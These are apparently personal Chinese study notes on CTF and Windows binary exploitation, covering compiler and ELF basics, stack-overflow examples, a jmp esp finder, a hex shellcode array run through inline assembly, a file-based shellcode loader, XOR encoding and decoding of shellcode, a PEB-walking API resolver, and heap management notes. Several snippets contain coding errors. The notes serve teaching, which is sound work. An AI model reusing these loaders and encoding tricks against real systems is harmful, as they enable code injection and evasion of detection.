书籍

第一章

CTF：Capture The Flag
竞赛模式：解题模式（RE逆向工程、Pwn漏洞挖掘与利用、Web渗透、Crypto密码学、Mobile移动安全、Misc杂项）
、攻防模式、混合模式
著名赛事：DEFCON CTF、Pwn2Own、CGC、XCTF、强网杯、HITCON CTF、TCTF
网络安全会议：RSA、BlackHat、ISC
学术会议：CCS、NDSS、Oakland S&P(A)、USENIX(A)

第二章

编译器的结构可分为前端和后端，前端是机器无关的，其功能是把源程序分解成组成要素和相应的语法结构，通过这个结构创建源程序的中间表示，同时搜集和源程序相关的信息，存放到符号表中；后端是及其相关的，其功能是根据中间表示和符号表信息构造目标程序。
GCC的编译主要分为四个阶段：预处理（-E）、编译（-S）、汇编（-c）、链接。
ELF(Executable and Linkable Format)格式是COFF格式的变种。
ELF文件分为三种类型：可执行文件（.EXEC）、可重定位文件（.REL）和共享目标文件（.DYN）；
通常目标文件都会包含代码（.text）、数据（.data）和BSS（.bss）三个节，BSS节用于保存未初始化的全局变量和局部静态变量。

第三章

最先诞生的是复杂指令集计算机（CISC），典型代表就是x86处理器。
对于x86处理器而言，有三个最主要的操作模式：保护模式、实地址模式和系统管理模式,此外还有一个保护模式的子模式，称为虚拟8086模式。
x86汇编语言主要的语法风格有两种：AT&T风格和Intel风格。

第四章

第五章

视频

漏洞分析与利用
漏洞是bug的一种。

//栈溢出-临近变量淹没
#include<stdio.h>
#include<string.h>
#define PASSWORD "1234567"

int verify_password(char* password)
{
        int authenticated;
        char buffer[8];
        authenticated = strcmp(password, PASSWORD);
        strcpy(buffer, password); //输入 12345678 ，覆盖authenticated的值，返回0
        return authenticated;
}

int main()
{
        int valid_flag = 0;
        char password[1024];
        while (1)
        {
                printf("input:");
                scanf("%s",password);
                valid_flag = verify_password(password);
                if (valid_flag)
                {
                        printf("error\n");
                }
                else
                {
                        printf("right\n");
                }
        }
        return 0;
}

栈溢出-返回地址覆盖

//栈溢出-手工代码植入
#include<stdio.h>
#include<stdlib.h>
#include<Windows.h>

#define PASSWORD "1234567"
int verify_password(char* password)
{
    int authenticated;
    char buffer[44];
    authenticated = strcmp(password, PASSWORD);
    strcpy(buffer, password);
    return authenticated;
}

int main()
{
    int valid_flag = 0;
    char password[1024];
    FILE* fp;
    LoadLibrary("user32.dll");
    if (!(fp = fopen("C:\\Users\\VirAy\\Desktop\\flag.txt", "rw+")))
    {
        exit(0);
    }
    fscanf(fp, "%s", password);
    valid_flag = verify_password(password);
    if (valid_flag)
    {
        printf("Password is correct!\n");
    }
    else
    {
        printf("Password is incorrect!\n");
    }
    fclose(fp);
}

函数代码在栈中保存顺序：
buffer
前栈帧EBP
返回地址
ESP

//寻找jmp esp
#include<stdio.h>
#include<stdlib.h>
#include<Windows.h>

#define DLL_NAME "user32.dll"

int main(int argc, char* argv[])
{
	HINSTANCE hInstance = LoadLibrary(DLL_NAME);
	if (!hInstance)
	{
		exit(0);
	}
	BYTE* ptr;
	ptr = (BYTE*)hInstance;
	BOOL flag = false;
	int count = 0;
	for (int i = 0; !flag; i++)
	{
		if (ptr[i] == 0Xff && ptr[i + 1] == 0Xe4)
		{
			int address = (int)ptr + i;
			printf("opcode address:0x%x\n",address);
			count++;
			if (count == 50)
			{
				system("pause");
			}
		}
	}
	return 0;
}

unsigned char SHELLCODE[189] = {
	0x83, 0xC0, 0x14, 0x33, 0xC9, 0x8A, 0x1C, 0x08,
	0x80, 0xF3, 0x44, 0x88, 0x1C, 0x08, 0x41, 0x80,
	0xFB, 0x90, 0x75, 0xF1, 0xB8, 0x2C, 0x2E, 0x4E,
	0x7C, 0x5A, 0x2C, 0x27, 0xCD, 0x95, 0x0B, 0x2C,
	0x76, 0x30, 0xD5, 0x48, 0xCF, 0xB0, 0xC9, 0x3A,
	0xB0, 0x77, 0x9F, 0xF3, 0x40, 0x6F, 0xA7, 0x22,
	0xFF, 0x77, 0x76, 0x17, 0x2C, 0x31, 0x37, 0x21,
	0x36, 0x10, 0x77, 0x96, 0x20, 0xCF, 0x1E, 0x74,
	0xCF, 0x0F, 0x48, 0xCF, 0x0D, 0x58, 0xCF, 0x4D,
	0xCF, 0x2D, 0x4C, 0xE9, 0x79, 0x2E, 0x4E, 0x7C,
	0x5A, 0x31, 0x41, 0xD1, 0xBB, 0x13, 0xBC, 0xD1,
	0x24, 0xCF, 0x01, 0x78, 0xCF, 0x08, 0x41, 0x3C,
	0x47, 0x89, 0xCF, 0x1D, 0x64, 0x47, 0x99, 0x77,
	0xBB, 0x03, 0xCF, 0x70, 0xFF, 0x47, 0xB1, 0xDD,
	0x48, 0xFA, 0x42, 0x7E, 0x80, 0x30, 0x4C, 0x85,
	0x8E, 0x43, 0x47, 0x94, 0x02, 0xAF, 0xB5, 0x7F,
	0x10, 0x60, 0x58, 0x31, 0xA0, 0xCF, 0x1D, 0x60,
	0x47, 0x99, 0x32, 0xCF, 0x78, 0x3F, 0xCF, 0x1D,
	0x58, 0x47, 0x99, 0x47, 0x68, 0xFF, 0xD1, 0x1B,
	0xEF, 0x13, 0x25, 0x79, 0x2E, 0x4E, 0x7F, 0x5A,
	0x31, 0xED, 0x77, 0x9F, 0x17, 0x2C, 0x33, 0x21,
	0x37, 0x30, 0x2C, 0x22, 0x25, 0x2D, 0x28, 0xCF,
	0x80, 0x17, 0x14, 0x14, 0x17, 0xBB, 0x13, 0xB8,
	0x17, 0xBB, 0x13, 0xBC, 0xD4
};

int main(int argc,char** argv)
{
	__asm
	{
		LEA EAX,SHELLCODE
		PUSH EAX
		RET
	}
}

//计算函数哈希
#include<stdio.h>
#include<stdlib.h>
#include<time.h>
#include<Windows.h>

DWORD GetHash(char *fun_name)
{
	DWORD d = 0;
	while (*fun_name)
	{
		d = ((d << 25) | (d >> 7));
		d += *fun_name;
		fun_name++;
	}
	return d;
}

int main(int argc,char** argv)
{
	DWORD hash;
	hash = GetHash((char*)"MessageBoxA");
	printf("%.8x\h",hash);
	return 0;
}

//加载shellcode
#include<stdio.h>
#include<Windows.h>

int main()
{
	FILE* fp = fopen("file.bin", "rb");
	if (fp)
	{
		fseek(fp, 0, SEEK_END);
		DWORD dwSize = ftell(fp);
		fseek(fp, 0, SEEK_SET);
		LPVOID pAddr = VirtualAlloc(0, dwSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
		fread(pAddr, dwSize, 1, fp);
		fclose(fp);
		__asm {
			mov eax, pAddr;
			call eax;
		}

	}
}

//异或加密shellcode
#include<stdio.h>
#include<stdlib.h>
#include<Windows.h>
#include<string.h>

char SHELLCODE[189] = {
    0x83, 0xC0, 0x14, 0x33, 0xC9, 0x8A, 0x1C, 0x08,
    0x80, 0xF3, 0x44, 0x88, 0x1C, 0x08, 0x41, 0x80,
    0xFB, 0x90, 0x75, 0xF1, 0xB8, 0x2C, 0x2E, 0x4E,
    0x7C, 0x5A, 0x2C, 0x27, 0xCD, 0x95, 0x0B, 0x2C,
    0x76, 0x30, 0xD5, 0x48, 0xCF, 0xB0, 0xC9, 0x3A,
    0xB0, 0x77, 0x9F, 0xF3, 0x40, 0x6F, 0xA7, 0x22,
    0xFF, 0x77, 0x76, 0x17, 0x2C, 0x31, 0x37, 0x21,
    0x36, 0x10, 0x77, 0x96, 0x20, 0xCF, 0x1E, 0x74,
    0xCF, 0x0F, 0x48, 0xCF, 0x0D, 0x58, 0xCF, 0x4D,
    0xCF, 0x2D, 0x4C, 0xE9, 0x79, 0x2E, 0x4E, 0x7C,
    0x5A, 0x31, 0x41, 0xD1, 0xBB, 0x13, 0xBC, 0xD1,
    0x24, 0xCF, 0x01, 0x78, 0xCF, 0x08, 0x41, 0x3C,
    0x47, 0x89, 0xCF, 0x1D, 0x64, 0x47, 0x99, 0x77,
    0xBB, 0x03, 0xCF, 0x70, 0xFF, 0x47, 0xB1, 0xDD,
    0x48, 0xFA, 0x42, 0x7E, 0x80, 0x30, 0x4C, 0x85,
    0x8E, 0x43, 0x47, 0x94, 0x02, 0xAF, 0xB5, 0x7F,
    0x10, 0x60, 0x58, 0x31, 0xA0, 0xCF, 0x1D, 0x60,
    0x47, 0x99, 0x32, 0xCF, 0x78, 0x3F, 0xCF, 0x1D,
    0x58, 0x47, 0x99, 0x47, 0x68, 0xFF, 0xD1, 0x1B,
    0xEF, 0x13, 0x25, 0x79, 0x2E, 0x4E, 0x7F, 0x5A,
    0x31, 0xED, 0x77, 0x9F, 0x17, 0x2C, 0x33, 0x21,
    0x37, 0x30, 0x2C, 0x22, 0x25, 0x2D, 0x28, 0xCF,
    0x80, 0x17, 0x14, 0x14, 0x17, 0xBB, 0x13, 0xB8,
    0x17, 0xBB, 0x13, 0xBC, 0xD4
};

// 加密函数，将输入数据进行异或加密后保存到文件
void encoder(char *input, unsigned char key)
{
    int i = 0, len = 0;
    FILE *fp;
    unsigned char *output;

    len = strlen(input);
    output = (unsigned char *)malloc(len + 1);
    if (!output)
    {
        printf("Error:Memory Allocation Failed\n");
        exit(1);
    }

    // 进行异或加密操作
    for (i = 0; i < len; i++)
    {
        output[i] = input[i] ^ key;
    }

    if (!(fp = fopen("encode.txt", "wb")))  // 以二进制写模式打开文件更合适，避免文本模式的一些潜在转换问题
    {
        printf("Error:File Not Found\n");
        free(output);  // 如果文件打开失败，释放已分配的内存
        exit(1);
    }

    // 将加密后的数据写入文件
    fwrite(output, sizeof(unsigned char), len, fp);
    fclose(fp);
    free(output);
}

int main()
{
    encoder(SHELLCODE, 0xFF);
    return 0;
}

//shellcode解码
__asm int 3
__asm{
    nop
    nop
    nop
    xor ecx,ecx
decode_loop:
    mov bl,[eax+ecx]
    xor bl,key
    mov[eax+ecx],bl
    inc ecx
    cmp bl,0x90
    jne decode_loop
    nop
    nop
    nop
}

//通用shellcode
#include<stdio.h>
#include<stdlib.h>
#include<Windows.h>
#include<string.h>
#pragma code_seg("shell")
#pragma comment(link,"/entry:myshellcode")
void myshellcode()
{
    typedef FARPROC (WINAPI *fnGetProcAddress)(HMODULE hModule,LPCSTR lpProcName);
    typedef HMODULE (WINAPI *fnLoadLibraryExA)(LPCSTR lpLibFileName,HANDLE hFile,DWORD dwFlags); 
    DWORD dwKernel32Addr=0;
    __asm{
        //*****获取kernel32.dll模块基址开始*****
        push eax
        mov eax,dword ptr fs:[30]
        mov eax,[eax+0x0C]
        mov eax,[eax+0x1C]
        mov eax,[eax]
        mov eax,[eax+0x08]
        mov dwKernel32Addr,eax
        pop eax
         //*****获取kernel32.dll模块基址结束*****
    }
    //*****获取GetProcAddress函数地址开始*****
    DWORD dwAddrBase=dwKernel32Addr;
    PIMAGE_DOS_HEADER pDosHeader;
    PIMAGE_NT_HEADERS pNtHeader;
    pDosHeader=(PIMAGE_DOS_HEADER)dwAddrBase;
    pNtHeader=(PIMAGE_NT_HEADERS)(dwAddrBase+pDosHeader->e_lfanew);
    PIMAGE_DATA_DIRECTORY pDataDir;
    PIMAGE_EXPORT_DIRECTORY pExportDir;
    pDataDir=pNtHeader->OptionalHeader.DataDirectory+IMAGE_DIRECTORY_ENTRY_EXPORT;
    pExportDir=(PIMAGE_EXPORT_DIRECTORY)(dwAddrBase+pDataDir->VirtualAddress);

    PDWORD pAddrOfFun=(PWORD)(pExportDir->AddressOfFunctions+dwAddrBase);
    PDWORD pAddrOfName=(PDWORD)(pExportDir->AddressOfNames+dwAddrBase);
    PWORD pAddrOfOrd=(PWORD)(pExportDir->AddressOfNameOrdinals+dwAddrBase);
    DWORD dwFunAddr;
    for(DWORD i=0;i<pExportDir->NumberOfNames;i++)
    {
        char *pName=(char*)(pAddrOfName[i]+dwAddrBase);
        if(strcmp(pName,"GetProcAddress")==0)
        {
            dwFunAddr=pAddrOfFun[pAddrOfOrd[i]]+dwAddrBase;
            break;
        }
    }
    //*****获取GetProcAddress函数地址结束*****
    char szLoadLibraryExA[]={'L','o','a','d','L','i','b','r','a','r','y','E','x','A','\0'};
    //char szUser32[]={'u','s','e','r','3','2','\0'};
    //char szMessageBoxA[]={'M','e','s','s','a','g','e','B','o','x','A','\0'};
    //char szExitProcess[]={'E','x','i','t','P','r','o','c','e','s','s','\0'};
    fnGetProcAddress pfnGetProcAddress=(fnGetProcAddress)dwFunAddr;
    LoadLibraryExA pfnLoadLibraryExA=(fnLoadLibraryExA)pfnGetProcAddress((HMODULE)dwKernel32Addr,szLoadLibraryExA);
}

	堆内存	栈内存
典型用例	动态增长的链表等数据结构	函数局部数组
申请方式	使用函数申请，通过指针使用	直接声明
释放方式	使用函数释放	系统回收
管理方式	使用者申请与释放	系统完成申请与释放
所处位置	变化范围很大	0X0012XXXX
增长方向	由低到高	由高到低

windows堆分配
通过堆，内存管理器将一块较大的内存空间委托给堆管理器来管理；

用户态
小内存：堆管理器分配堆，调用堆分配API从堆管理器分配堆，堆分配API包括LocalAlloc、GlobalAlloc、HeapAlloc、malloc等；

大内存：内存管理器分配堆，调用虚拟内存分配API来从内存管理器分配内存，虚拟内存API包括VirtualAlloc、VirtualAllocEx、VirtualFree、VirtualFreeEx、VirtualLock、VirtualUnload、VirtualPotect、VirtualQuery等；

内核态
小内存：池管理器（Pool Manager）。池管理器公开了一组驱动程序接口以向外提供服务，包括ExAllocatePool、ExAllocatePoolwithTag、ExAllocatePoolWithTagPriority、ExAllocatePoolwithQuota、ExFessPool、ExFreePoolwithTag等；
大内存：内存管理器分配虚拟内存，内核对应的API包括NtAllocatevirtualMemory、NtProtectvirtualMemory等；

程序中对堆的直接操作主要有三种：
1、进程默认堆：每个进程启动的时候系统会创建一个默认堆，LocalAlloc、GlobalAlloc是从进程默认堆上分配内存；也可以使用GetProcessHeap获取进程默认堆的句柄；然后根据用这个句柄去调用HeapAlloc达到在系统默认堆上分配内存的效果；
2、C++编程中常用的是malloc和new去申请内存，这些由CRT库提供方法。在VS2010之前(包含)，CRT库会使用HeapCreate去创建一个堆，供CRT库自己使用。在VS2015以后CRT库的实现，并不会再去创建一个单独的堆，而使用进程默认堆。
3、自建堆。这个泛指程序通过HeapCreate去创建的堆，然后利用HeapAlloc等API去操作堆，比如申请空间；

为了支持C的内存分配函数和C++的内存分配运算符（new和delete，即CRT内存分配函数），编译器的C运行库会创建一个专门的堆供这些函数使用，即CRT堆。

进程默认堆
创建进程时操作系统为进程创建的默认堆：ntdll! KiUserApcDispather-> ntdll! LdrpInitialize-> ntdll! LdrplInitializeProcess-> ntdll! RtlCreateHeap
创建好的堆的句柄保存在PEB结构的ProcessHeap字段中;

私有堆
可以通过HeapCreate这个api来创建属于进程的私有堆，这个api实际上会调用RtlCreateHeap函数，创建完毕之后会将创建好的堆句柄保存到peb结构中。
HeapCreate-> ntdll!RtlCreateHeap-> NtAllocateVirtualMemory
Windows 堆管理机制 [1] 堆基础
 https://www.bilibili.com/video/BV13cBXYqE2m?t=103.7&p=32